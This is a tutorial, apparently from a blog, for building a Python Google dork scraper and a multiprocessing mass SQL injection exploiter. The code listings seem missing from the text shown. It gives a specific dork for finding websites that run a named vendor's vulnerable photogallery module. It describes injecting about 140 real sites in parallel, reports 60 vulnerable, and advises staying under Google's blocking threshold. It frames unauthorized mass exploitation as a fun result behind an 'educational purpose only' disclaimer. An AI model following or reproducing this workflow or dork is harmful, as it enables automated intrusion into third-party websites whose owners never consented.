[Python] Making Your Own Google Scraper & Mass Exploiter

In this Step by Step Tutorial, I’ll show you how to make your own Google Scraper (Dork Scanner) and Mass Vulnerability Scanner / Exploiter in Python.

Why Python? .. Because Why not ?

  • Simplicity
  • Efficiency
  • Extensibility
  • Cross-Platform Runability
  • Best Community


For this tutorial, I’ll be using Python 3.4.3, some built in libraries (sys, multiprocessing, functoolsre) and following modules.


Requests is an Apache2 Licensed HTTP library, written in Python, for human beings.


Beautiful Soup sits atop an HTML or XML parser, providing Pythonic idioms for iterating, searching, and modifying the parse tree.

To install these modules, I’ll use pip. As per the documentation, pip is the preferred installer program and starting with Python 3.4, it is included by default with the Python binary installers. To use pip, open you terminal and simply type :


Now we’re ready. Let’s get started.


I’ll try to make this as simple (readable) as possible. Read the comments  given in the codes. With each new code, I’ll remove previous comments to make space for the new ones. So make sure you don’t miss any.

First of all, Let’s see how Google search works.

This URL takes two parameters q and start.

q = Our search string

start = page number * 10

So, if I want to do a search for a string makman. The URLs would be:

Let’s do a quick test and see if we can grab the first page.

It’ll display the html source.


Now, we’ll use beautifulsoup4 to pull the required data from the source. Our required URLs are inside <h3 class=”r”> tags with class ‘r’.


There’ll be 10 <h3 class=”r”> on each page and our required URL will be inside these h3 tags as <a href=”here”>. So, we’ll use beautifulsoup4 to grab the contents of all these h3 tags and then some regex matching to get our final URLs.

And we’ll get the URLs of the first page.


Now we just have to do this whole procedure generically. User will provide the search string and number of pages to scan. I’ll make a function of this whole process and call it dynamically when required. To create the command line interface, I’ll use an awesome module called docopt which is not included in Pythons core but you’ll love it. I’ll use pip (again) to install docopt.


After adding command line interface, user interaction, little dynamic functionality and some time logging functions to check the execution time of the script, this is what it looks like.

Now let’s give it a try.


Sweet. 😀 Let’s run it for the string ‘microsoft’, scan first 20 pages and check the execution time.


So, It scraped 200 URLs in about 32 Seconds. Currently, It’s running as a single process. Let’s add some multi-processing and see if we can reduce the execution time. After adding multi-processing features, this is what my script looks like.

Now let’s run the same string ‘microsoft’ for 20 pages but this time with 8 parallel processes. 😀



Perfect. The execution time went down to 6 seconds, almost 5 times lesser than the previous attempt.


It won’t be a good idea to use more than 8 parallel processes. Google may block your IP or display the captcha verification page instead of the search results. I would recommend to keep it under 8.

So, Our Google URL Scraper is up and running 😀 . Now I’ll show you how to make a mass vulnerability scanner & exploitation tool using this Google Scraper. We can save this file and use it as a separate module in other projects. I’ll save the following code as makman.py .

I have renamed the main function to dork_scanner. Now, I can import this file in any other python code and call dork_scanner to get URLs. This dork_scanner takes 3 parameters : search string, pages to scan and number of parallel processes. At the end, It will return a list of URLs. Just make sure makman.py is in the same directory as the other file. Let’s try it out.


Mass Scanning / Exploitation

I’ll demonstrate mass scanning / exploitation using an SQL Injection vulnerability which is affecting some websites developed by iNET Business Hub (Web Application Developers). Here’s a demo of an SQLi vulnerability in their photogallery module.


Even though this vulnerability is very old, there are still hundreds of websites vulnerable to this bug. We can use the following Google dork to find the vulnerable websites.

intext:Developed by : iNET inurl:photogallery.php

I’ve made a separate function to perform the injection. Make sure makman.py is in the same directory.

I’ll call my dork_scanner function in the main function and scan first 15 pages with 4 parallel processes. And for the exploitation part, I’ll use 8 parallel processes because we have to inject around 150 URLs and it’ll take hell lot of time with a single process. So, after adding the main function, Multiprocessing to the exploitation part and some file logging to save the results, this is what my script looks like.


Scan Result:

Total URLs Scanned : 140
Vulnerable URLs Found : 60
Script Execution Time : 64.60677099227905

So technically speaking, in 64 seconds, we scanned 15 pages of Google, grabbed 140 URLs, went to 140 URLs individually & performed SQL Injection and finally saved the results of 60 vulnerable URLs. So F***in Cool !!

You can see the result file generated at the end of the script here.

GitHub Repository:

Final Notes:

This script is not perfect. We can still add so many features to it. If you have any suggestions, feel free to contact me. Details are in the footer. And thanks for reading.


I hereby take no responsibility for the loss/damage caused by this tutorial. This article has been shared for educational purpose only and Automatic crawling is against Google’s terms of service.